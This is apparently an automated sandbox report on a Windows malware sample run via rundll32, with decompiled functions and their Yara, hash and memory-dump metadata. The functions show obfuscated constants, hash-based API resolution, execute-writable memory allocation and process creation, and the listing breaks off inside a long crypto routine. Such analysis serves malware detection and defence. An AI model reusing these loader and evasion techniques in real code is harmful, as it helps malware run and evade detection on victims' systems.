Function 004404C7, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E004404C7() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t48;
				signed int _t49;

				_v8 = 0xb3b9;
				_v8 = _v8 + 0x1dd8;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x000002ef;
				_v20 = 0x5082;
				_t48 = 0xc;
				_v20 = _v20 / _t48;
				_v20 = _v20 ^ 0x00006c35;
				_v12 = 0x710;
				_v12 = _v12 >> 3;
				_t49 = 0x6d;
				_v12 = _v12 / _t49;
				_v12 = _v12 ^ 0x0000532a;
				_v16 = 0x5a4c;
				_v16 = _v16 ^ 0xca4a1f4d;
				_v16 = _v16 ^ 0xca4a24cd;
				E00437378(_t49, 0xbe36c403, _t49, 0x90f109b3, 0x2de);
				ExitProcess(0);
			}

0x004404cd
0x004404d6
0x004404dd
0x004404e1
0x004404e5
0x004404ec
0x004404f8
0x004404fd
0x00440502
0x00440509
0x00440510
0x00440517
0x0044051f
0x00440522
0x00440529
0x00440530
0x00440537
0x00440556
0x00440560

APIs

ExitProcess.KERNEL32(00000000), ref: 00440560

Strings

5l, xrefs: 00440502
*S, xrefs: 00440522
LZ, xrefs: 00440529

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: *S$5l$LZ
API String ID: 621844428-1939029103
Opcode ID: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
Instruction ID: af7bd3c2a44eb39dc116972fe8eb74abf49270c84b792a02763e269270851407
Opcode Fuzzy Hash: 1f04293e4df0c36aeb8e1b786eb226675117cff09b963e674629fc10ae944d0b
Instruction Fuzzy Hash: 9611F771E0520CEBEB04DFE5D84AA9EBBB1EB50714F10C189E414A7284D7F96B549F41

Uniqueness

Uniqueness Score: -1.00%

Function 00491638, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 00491686

Strings

Link, xrefs: 00491666

Memory Dump Source

Source File: 00000007.00000002.2331029557.0000000000453000.00000020.00020000.sdmp, Offset: 00453000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_453000_rundll32.jbxd

Similarity

API ID: Initialize
String ID: Link
API String ID: 2538663250-2526951119
Opcode ID: 906619fd4c376d3e714d48706fe15403d889f318c7d236f4e8b7415e38ec49fd
Instruction ID: eef8bca019aabe414b2a40394a867451b2e6461e668f936241f102555f854f71
Opcode Fuzzy Hash: 906619fd4c376d3e714d48706fe15403d889f318c7d236f4e8b7415e38ec49fd
Instruction Fuzzy Hash: 0F116D70600701ABDB20EF76DD82A4E7BE4EF49704F90683AF800D76A1EA39A9018759

Uniqueness

Uniqueness Score: -1.00%

Function 0018EB40, Relevance: 3.3, APIs: 2, Instructions: 252
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0018EB8F
VirtualProtect.KERNELBASE(?,?,00000000), ref: 0018EDD9

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction ID: 06d2dc32c4f82e3338f5a930e26645ce13a584b94888247fee78d394b3c3cb33
Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
Instruction Fuzzy Hash: 25C1A975A00209DFCB48DF98C590EAEB7B6BF88304F148159E9199B355D735EE42CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00491A14, Relevance: 3.1, APIs: 2, Instructions: 56
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00491AC8: DdeFreeStringHandle.USER32(?,?), ref: 00491AE8

DdeCreateStringHandleA.USER32(?,00000000), ref: 00491A82
DdeNameService.USER32(?,00000000,00000000,00000001), ref: 00491A95

Memory Dump Source

Source File: 00000007.00000002.2331029557.0000000000453000.00000020.00020000.sdmp, Offset: 00453000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_453000_rundll32.jbxd

Similarity

API ID: HandleString$CreateFreeNameService
String ID:
API String ID: 374373348-0
Opcode ID: 0366d4933a16efbeb1be7be26edd0a5dac492f74d47b74a9cc3f90e051b65ceb
Instruction ID: a45891f81d9dc476452201038e6951c8dc7a5a819b6c43b8d44ab571fc3f99e3
Opcode Fuzzy Hash: 0366d4933a16efbeb1be7be26edd0a5dac492f74d47b74a9cc3f90e051b65ceb
Instruction Fuzzy Hash: 1C118E317112546FCF11EEA5C882E8E3BACAF89B04F5015BAFC009B256DA78ED00879C

Uniqueness

Uniqueness Score: -1.00%

Function 00437F4B, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00437F4B(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t35;
				int _t43;
				WCHAR* _t46;

				_push(_a12);
				_t46 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00442550(_t35);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x71485a;
				_v28 = 0x57c810;
				_v20 = 0x2813;
				_v20 = _v20 * 0x59;
				_v20 = _v20 ^ 0x000dd428;
				_v16 = 0xdb84;
				_v16 = _v16 | 0xe2c96d38;
				_v16 = _v16 ^ 0xe2c994d7;
				_v12 = 0xc19e;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x000060ae;
				_v8 = 0x265e;
				_v8 = _v8 + 0x315a;
				_v8 = _v8 << 0xb;
				_v8 = _v8 ^ 0x02bd94c0;
				E00437378(__ecx, 0x8a39c19d, __ecx, 0x90f109b3, 0x96);
				_t43 = lstrcmpiW(_t46, _a4); // executed
				return _t43;
			}

0x00437f52
0x00437f55
0x00437f57
0x00437f5a
0x00437f5e
0x00437f5f
0x00437f64
0x00437f6b
0x00437f72
0x00437f79
0x00437f94
0x00437f97
0x00437f9e
0x00437fa5
0x00437fac
0x00437fb3
0x00437fba
0x00437fbe
0x00437fc5
0x00437fcc
0x00437fd3
0x00437fd7
0x00437feb
0x00437ff7
0x00437ffd

APIs

lstrcmpiW.KERNELBASE(?,000060AE,?,?,?,?,?,?,?,?,?,00000000), ref: 00437FF7

Strings

ZHq, xrefs: 00437F6B

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID: ZHq
API String ID: 1586166983-2177431251
Opcode ID: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
Instruction ID: 35b678b378ea69d5d5386f3d7e7fa6c13631bf9d72977c6a30fa2499f3d01131
Opcode Fuzzy Hash: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
Instruction Fuzzy Hash: B8110FB6C00219BBDF00DFA4C90A8DEBFB4EF04318F108589E92466241D3B95B14DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0018E620, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0018E6A4

Strings

VirtualAlloc, xrefs: 0018E689, 0018E68C

Memory Dump Source

Source File: 00000007.00000002.2330819639.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_170000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction ID: 23ab8545f52cd1dbbb4ed2bae835258edf46687b8e57c93c9682c3c345f8e935
Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction Fuzzy Hash: B7114260D082C9DEEF01D7E884497FFBFB55F21704F044098D5456B282D3BA57588BB6

Uniqueness

Uniqueness Score: -1.00%

Function 0044B86E, Relevance: 1.6, APIs: 1, Instructions: 74
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 40%

			E0044B86E(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a24, struct _PROCESS_INFORMATION* _a40, intOrPtr _a44, intOrPtr _a48, WCHAR* _a52, intOrPtr _a56, struct _STARTUPINFOW* _a60, intOrPtr _a68) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				void* _t49;
				int _t58;
				signed int _t60;
				int _t65;

				_push(_a68);
				_t65 = __ecx;
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(0);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00442550(_t49);
				_v12 = 0xd1fa;
				_t60 = 0x3c;
				_v12 = _v12 / _t60;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 ^ 0x00001682;
				_v20 = 0xd4c2;
				_v20 = _v20 + 0x3986;
				_v20 = _v20 ^ 0x00013905;
				_v8 = 0x8c53;
				_v8 = _v8 >> 4;
				_v8 = _v8 << 1;
				_v8 = _v8 ^ 0x000060d6;
				_v16 = 0x467b;
				_v16 = _v16 + 0xffff2b71;
				_v16 = _v16 ^ 0xffff105c;
				E00437378(_t60, 0x8aa9db76, _t60, 0x90f109b3, 0x100);
				_t58 = CreateProcessW(_a52, _a24, 0, 0, _t65, 0, 0, 0, _a60, _a40); // executed
				return _t58;
			}

0x0044b876
0x0044b87b
0x0044b87d
0x0044b87e
0x0044b881
0x0044b884
0x0044b887
0x0044b88a
0x0044b88d
0x0044b890
0x0044b891
0x0044b892
0x0044b893
0x0044b896
0x0044b897
0x0044b89a
0x0044b89d
0x0044b8a0
0x0044b8a4
0x0044b8a5
0x0044b8aa
0x0044b8bb
0x0044b8c3
0x0044b8c6
0x0044b8ca
0x0044b8d1
0x0044b8d8
0x0044b8df
0x0044b8e6
0x0044b8ed
0x0044b8f1
0x0044b8f4
0x0044b8fb
0x0044b902
0x0044b909
0x0044b928
0x0044b942
0x0044b949

APIs

CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 0044B942

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
Instruction ID: 53e7f75c939fd239ca5f7d25274f268f9815689204d2d4fcb24de1ecb3749a3e
Opcode Fuzzy Hash: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
Instruction Fuzzy Hash: 2F21E672800248BBDF159F95CD09CDFBF79FF89714F408148FA1466160D7B69A60DB60

Uniqueness

Uniqueness Score: -1.00%

Function 0043471A, Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E0043471A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _t50;
				intOrPtr* _t61;
				void* _t62;
				signed int _t63;
				signed int _t64;

				E00442550(_t50);
				_v20 = 0xf336;
				_v20 = _v20 + 0x29f7;
				_v20 = _v20 ^ 0x000152a0;
				_v8 = 0xc9c4;
				_v8 = _v8 >> 0x10;
				_v8 = _v8 << 3;
				_t63 = 0x6d;
				_v8 = _v8 * 0x43;
				_v8 = _v8 ^ 0x0000467c;
				_v16 = 0x763b;
				_t64 = 0x2d;
				_v16 = _v16 / _t63;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x000058e5;
				_v12 = 0x527e;
				_v12 = _v12 / _t64;
				_v12 = _v12 | 0xd776a7a3;
				_v12 = _v12 ^ 0xd776f938;
				_t61 = E00437378(_t64, 0x23d331d1, _t64, 0xd20b8aa4, 0x174);
				_t62 =  *_t61(0, _a4, 0, 0, _a8, 0, 0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, 0); // executed
				return _t62;
			}

0x0043473b
0x00434740
0x0043474a
0x00434753
0x0043475a
0x00434761
0x00434765
0x0043476f
0x00434772
0x00434775
0x0043477c
0x00434788
0x00434789
0x0043478e
0x00434792
0x00434799
0x004347aa
0x004347ad
0x004347b4
0x004347d3
0x004347e4
0x004347ea

APIs

SHGetFolderPathW.SHELL32(00000000,D776F938,00000000,00000000,000058E5), ref: 004347E4

Memory Dump Source

Source File: 00000007.00000002.2330983345.0000000000430000.00000040.00020000.sdmp, Offset: 00430000, based on PE: true

Associated: 00000007.00000002.2331018367.0000000000450000.00000040.00020000.sdmp Download File
Associated: 00000007.00000002.2331022756.0000000000452000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_430000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID:
API String ID: 1514166925-0
Opcode ID: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
Instruction ID: 268ced4dd2394903ea5f6e70674f7b258d11070e06f18aa27073fc095ac1affd
Opcode Fuzzy Hash: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
Instruction Fuzzy Hash: FB21F2B2D01208BBEF15DFE5C94A8DEBBB5EF05354F108089E924A6250D3B99B10EF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00445250, Relevance: 48.4, Strings: 38, Instructions: 936
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00445250() {
				char _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				void* _v96;
				char _v104;
				signed int _v108;
				signed int _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				char _v128;
				intOrPtr _v132;
				char _v140;
				void* _v148;
				char _v156;
				char _v160;
				char _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				unsigned int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				unsigned int _v244;
				signed int _v248;
				unsigned int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				unsigned int _v360;
				unsigned int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				signed int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				signed int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				unsigned int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				void* __ebx;
				intOrPtr _t927;
				intOrPtr _t947;
				signed int _t1117;
				signed int _t1118;
				signed int _t1121;
				signed int _t1122;
				signed int _t1123;
				signed int _t1124;
				signed int _t1125;
				signed int _t1126;
				signed int _t1127;
				signed int _t1128;
				signed int _t1129;
				signed int _t1130;
				signed int _t1131;
				signed int _t1132;
				signed int _t1133;
				signed int _t1134;
				signed int _t1135;
				signed int _t1136;
				signed int _t1137;
				signed int _t1138;
				signed int _t1143;
				void* _t1145;
				void* _t1148;
				void* _t1149;
				void* _t1150;

				_t1145 = (_t1143 & 0xfffffff8) - 0x220;
				_v72 = _v72 & 0x00000000;
				_v84 = 0x209410;
				_t1034 = 0x12e722cf;
				_v80 = 0x7fb3a;
				_v76 = 0x87a05;
				_v476 = 0x6f2d;
				_v476 = _v476 ^ 0x017c3002;
				_v476 = _v476 + 0xffffbd18;
				_v476 = _v476 | 0xc91499cd;
				_v476 = _v476 ^ 0xc97c9eea;
				_v280 = 0x77b6;
				_v280 = _v280 + 0x5656;
				_v280 = _v280 ^ 0x000089ef;
				_v380 = 0x736f;
				_v380 = _v380 << 2;
				_v380 = _v380 + 0x5e6a;
				_v380 = _v380 ^ 0x00026114;
				_v216 = 0xcbd1;
				_v216 = _v216 ^ 0x44eba388;
				_v216 = _v216 ^ 0x44eb05d5;
				_v296 = 0xc4c6;
				_v296 = _v296 + 0x2d2;
				_v296 = _v296 ^ 0x0000e1e8;
				_v288 = 0x42e8;
				_t1121 = 0x3f;
				_v288 = _v288 / _t1121;
				_v288 = _v288 ^ 0x00000dcd;
				_v244 = 0x282;
				_v244 = _v244 >> 6;
				_v244 = _v244 ^ 0x0000405b;
				_v252 = 0x771a;
				_v252 = _v252 >> 0xe;
				_v252 = _v252 ^ 0x00001031;
				_v492 = 0xf437;
				_v492 = _v492 >> 3;
				_t1122 = 0x61;
				_v492 = _v492 / _t1122;
				_v492 = _v492 + 0xffff3f4e;
				_v492 = _v492 ^ 0xffff2cd5;
				_v192 = 0x3176;
				_v192 = _v192 + 0x69b1;
				_v192 = _v192 ^ 0x0000ea14;
				_v420 = 0xc417;
				_v420 = _v420 + 0x8980;
				_v420 = _v420 ^ 0xd4e62d65;
				_v420 = _v420 ^ 0xd4e7684b;
				_v212 = 0x15f4;
				_v212 = _v212 * 0x22;
				_v212 = _v212 ^ 0x0002e648;
				_v456 = 0xe852;
				_v456 = _v456 >> 0xd;
				_v456 = _v456 + 0xffffcc84;
				_v456 = _v456 << 0xe;
				_v456 = _v456 ^ 0xf322a6d4;
				_v536 = 0x2d0a;
				_v536 = _v536 ^ 0xa9ca95e4;
				_v536 = _v536 * 0xe;
				_v536 = _v536 + 0xcaaf;
				_v536 = _v536 ^ 0x4916b696;
				_v224 = 0xd1a0;
				_v224 = _v224 >> 0xc;
				_v224 = _v224 ^ 0x00006736;
				_v184 = 0xb552;
				_v184 = _v184 ^ 0x240384b8;
				_v184 = _v184 ^ 0x24037a21;
				_v472 = 0x9384;
				_t1117 = 0x52;
				_v472 = _v472 / _t1117;
				_v472 = _v472 + 0x4a96;
				_v472 = _v472 ^ 0xcc9e8605;
				_v472 = _v472 ^ 0xcc9ec215;
				_v236 = 0x7622;
				_v236 = _v236 + 0xffff4cbc;
				_v236 = _v236 ^ 0xfffff78f;
				_v548 = 0xb822;
				_v548 = _v548 ^ 0x5a18f77c;
				_v548 = _v548 + 0xffff6a91;
				_t1123 = 6;
				_v548 = _v548 * 0x46;
				_v548 = _v548 ^ 0xa27cfa0f;
				_v428 = 0x9f04;
				_v428 = _v428 * 0x35;
				_v428 = _v428 + 0xde16;
				_v428 = _v428 ^ 0x0021bdfd;
				_v516 = 0xd39a;
				_v516 = _v516 / _t1123;
				_v516 = _v516 + 0x15af;
				_t1124 = 0x59;
				_v516 = _v516 / _t1124;
				_v516 = _v516 ^ 0x00007e9e;
				_v308 = 0xa16d;
				_v308 = _v308 + 0xe711;
				_v308 = _v308 + 0xffff4f28;
				_v308 = _v308 ^ 0x00009f4e;
				_v532 = 0x7266;
				_t1125 = 0x28;
				_v532 = _v532 / _t1125;
				_v532 = _v532 * 0x3d;
				_v532 = _v532 ^ 0xce065b2a;
				_v532 = _v532 ^ 0xce06dfd5;
				_v196 = 0x1672;
				_v196 = _v196 + 0xa446;
				_v196 = _v196 ^ 0x0000d90c;
				_v220 = 0xe32f;
				_v220 = _v220 << 6;
				_v220 = _v220 ^ 0x00389c68;
				_v432 = 0x625c;
				_v432 = _v432 + 0xffff71ce;
				_v432 = _v432 * 0x56;
				_v432 = _v432 + 0xffffa9e5;
				_v432 = _v432 ^ 0xfff0dd97;
				_v336 = 0xeda0;
				_v336 = _v336 + 0xeb07;
				_v336 = _v336 ^ 0x0001d4cc;
				_v272 = 0xcc88;
				_v272 = _v272 | 0x5dccb544;
				_v272 = _v272 ^ 0x5dccc982;
				_v352 = 0xf44c;
				_v352 = _v352 + 0xc438;
				_v352 = _v352 + 0xffff921a;
				_v352 = _v352 ^ 0x000119bf;
				_v500 = 0x896b;
				_v500 = _v500 + 0xffff320f;
				_v500 = _v500 << 2;
				_v500 = _v500 + 0x6054;
				_v500 = _v500 ^ 0xffff256a;
				_v468 = 0xb0db;
				_v468 = _v468 + 0x1d7c;
				_t1126 = 0x7c;
				_v468 = _v468 * 0x18;
				_v468 = _v468 / _t1126;
				_v468 = _v468 ^ 0x0000431a;
				_v384 = 0x26f0;
				_v384 = _v384 ^ 0x045f799c;
				_v384 = _v384 ^ 0x3dddf456;
				_v384 = _v384 ^ 0x39829c32;
				_v176 = 0xf7b7;
				_v176 = _v176 + 0x6391;
				_v176 = _v176 ^ 0x00016a08;
				_v248 = 0xecad;
				_v248 = _v248 + 0xffff796a;
				_v248 = _v248 ^ 0x00007c9b;
				_v376 = 0xe362;
				_v376 = _v376 + 0xffffce79;
				_t1127 = 0x13;
				_v376 = _v376 * 0x72;
				_v376 = _v376 ^ 0x004f6c3e;
				_v436 = 0x3eeb;
				_v436 = _v436 >> 7;
				_v436 = _v436 ^ 0x17e78ab4;
				_v436 = _v436 | 0x5631ea9d;
				_v436 = _v436 ^ 0x57f78106;
				_v344 = 0xfafb;
				_v344 = _v344 | 0xa088f90b;
				_v344 = _v344 << 4;
				_v344 = _v344 ^ 0x088fad6b;
				_v424 = 0xd20d;
				_v424 = _v424 | 0x976e33e5;
				_v424 = _v424 / _t1117;
				_v424 = _v424 ^ 0x01d88155;
				_v368 = 0xb305;
				_v368 = _v368 >> 4;
				_v368 = _v368 * 0x6f;
				_v368 = _v368 ^ 0x0004dd79;
				_v312 = 0x6c6e;
				_v312 = _v312 | 0x7aa669f9;
				_v312 = _v312 / _t1127;
				_v312 = _v312 ^ 0x0674fe9a;
				_v304 = 0x37ec;
				_v304 = _v304 ^ 0xd9da6a19;
				_v304 = _v304 ^ 0xd9da0267;
				_v408 = 0x189;
				_v408 = _v408 >> 3;
				_v408 = _v408 ^ 0x76db6b00;
				_v408 = _v408 ^ 0x76db7e0a;
				_v328 = 0xb7d;
				_v328 = _v328 ^ 0xd2ca4f28;
				_v328 = _v328 | 0x13588259;
				_v328 = _v328 ^ 0xd3da9a47;
				_v264 = 0xf9f8;
				_v264 = _v264 >> 0xc;
				_v264 = _v264 ^ 0x000003c9;
				_v256 = 0xc1c3;
				_v256 = _v256 + 0x1be1;
				_v256 = _v256 ^ 0x0000cdde;
				_v200 = 0x3e85;
				_t1128 = 0x76;
				_v200 = _v200 / _t1128;
				_v200 = _v200 ^ 0x000018d1;
				_v528 = 0x6317;
				_v528 = _v528 + 0x6e33;
				_v528 = _v528 << 0xa;
				_t1129 = 0x38;
				_v528 = _v528 / _t1129;
				_v528 = _v528 ^ 0x000eeaa2;
				_v180 = 0x5a91;
				_v180 = _v180 << 0x10;
				_v180 = _v180 ^ 0x5a913d65;
				_v484 = 0x2725;
				_v484 = _v484 >> 0xf;
				_v484 = _v484 + 0xffffcf28;
				_t1130 = 0x7f;
				_v484 = _v484 * 0x56;
				_v484 = _v484 ^ 0xffefd6a2;
				_v508 = 0xdc7;
				_v508 = _v508 * 0x18;
				_v508 = _v508 + 0xd9f6;
				_v508 = _v508 | 0xcb6e322e;
				_v508 = _v508 ^ 0xcb6e2f09;
				_v232 = 0xca01;
				_v232 = _v232 + 0xffff5b75;
				_v232 = _v232 ^ 0x0000641b;
				_v168 = 0x16fe;
				_v168 = _v168 ^ 0x17eb1dda;
				_v168 = _v168 ^ 0x17eb32d1;
				_v340 = 0xdfb5;
				_v340 = _v340 + 0xfffffcd7;
				_v340 = _v340 << 6;
				_v340 = _v340 ^ 0x00376540;
				_v260 = 0xf92f;
				_v260 = _v260 | 0xacfe7636;
				_v260 = _v260 ^ 0xacfe9e8f;
				_v348 = 0x96d2;
				_v348 = _v348 | 0x1aa809e7;
				_v348 = _v348 ^ 0x05f39991;
				_v348 = _v348 ^ 0x1f5b5d0b;
				_v396 = 0x247f;
				_v396 = _v396 ^ 0xf1f26a5d;
				_v396 = _v396 + 0xf16a;
				_v396 = _v396 ^ 0xf1f369c0;
				_v404 = 0xf1e8;
				_v404 = _v404 ^ 0x0fadedaf;
				_v404 = _v404 + 0x5347;
				_v404 = _v404 ^ 0x0fad279d;
				_v240 = 0x676b;
				_v240 = _v240 ^ 0xc965c134;
				_v240 = _v240 ^ 0xc965c068;
				_v412 = 0xa09f;
				_v412 = _v412 + 0xffff772a;
				_v412 = _v412 + 0xe197;
				_v412 = _v412 ^ 0x0000ae26;
				_v520 = 0xecbc;
				_v520 = _v520 + 0x348e;
				_v520 = _v520 / _t1130;
				_v520 = _v520 * 0x6f;
				_v520 = _v520 ^ 0x0000e534;
				_v284 = 0x3f47;
				_t455 =  &_v284; // 0x3f47
				_v284 =  *_t455 * 0x25;
				_v284 = _v284 ^ 0x00095ce6;
				_v276 = 0x6631;
				_v276 = _v276 | 0xb06bbfe9;
				_v276 = _v276 ^ 0xb06bf800;
				_v504 = 0x8c83;
				_v504 = _v504 * 0x5b;
				_v504 = _v504 * 0x3e;
				_v504 = _v504 >> 6;
				_v504 = _v504 ^ 0x00301e3a;
				_v488 = 0x4309;
				_v488 = _v488 >> 0xf;
				_t1131 = 0x58;
				_v488 = _v488 / _t1131;
				_v488 = _v488 + 0x27af;
				_v488 = _v488 ^ 0x000009a7;
				_v364 = 0xa96;
				_v364 = _v364 << 7;
				_v364 = _v364 >> 7;
				_v364 = _v364 ^ 0x00003920;
				_v480 = 0x9f6;
				_t1132 = 0x6b;
				_v480 = _v480 / _t1132;
				_v480 = _v480 << 0xd;
				_v480 = _v480 + 0xffff43ca;
				_v480 = _v480 ^ 0x00025c77;
				_v416 = 0xe237;
				_v416 = _v416 + 0xffff63bb;
				_v416 = _v416 + 0xffff2499;
				_v416 = _v416 ^ 0xffff6d1e;
				_v188 = 0x6325;
				_v188 = _v188 | 0xc894d050;
				_v188 = _v188 ^ 0xc8949af4;
				_v360 = 0xe854;
				_v360 = _v360 >> 5;
				_v360 = _v360 >> 4;
				_v360 = _v360 ^ 0x00006280;
				_v400 = 0x8eca;
				_v400 = _v400 << 7;
				_t1133 = 0x6d;
				_v400 = _v400 * 0x4b;
				_v400 = _v400 ^ 0x14eae0d6;
				_v228 = 0x2866;
				_v228 = _v228 + 0x1bda;
				_v228 = _v228 ^ 0x00005064;
				_v332 = 0x7acf;
				_v332 = _v332 + 0xffffa705;
				_v332 = _v332 + 0xffffeb79;
				_v332 = _v332 ^ 0x00001fe4;
				_v544 = 0x2e82;
				_v544 = _v544 ^ 0xbb465bc8;
				_v544 = _v544 << 0x10;
				_v544 = _v544 << 9;
				_v544 = _v544 ^ 0x94006b8d;
				_v172 = 0xf8c0;
				_v172 = _v172 + 0xffff4f46;
				_v172 = _v172 ^ 0x00007ce0;
				_v524 = 0xd322;
				_v524 = _v524 | 0x4cafabc6;
				_v524 = _v524 ^ 0x09010195;
				_v524 = _v524 + 0xb84e;
				_v524 = _v524 ^ 0x45afae17;
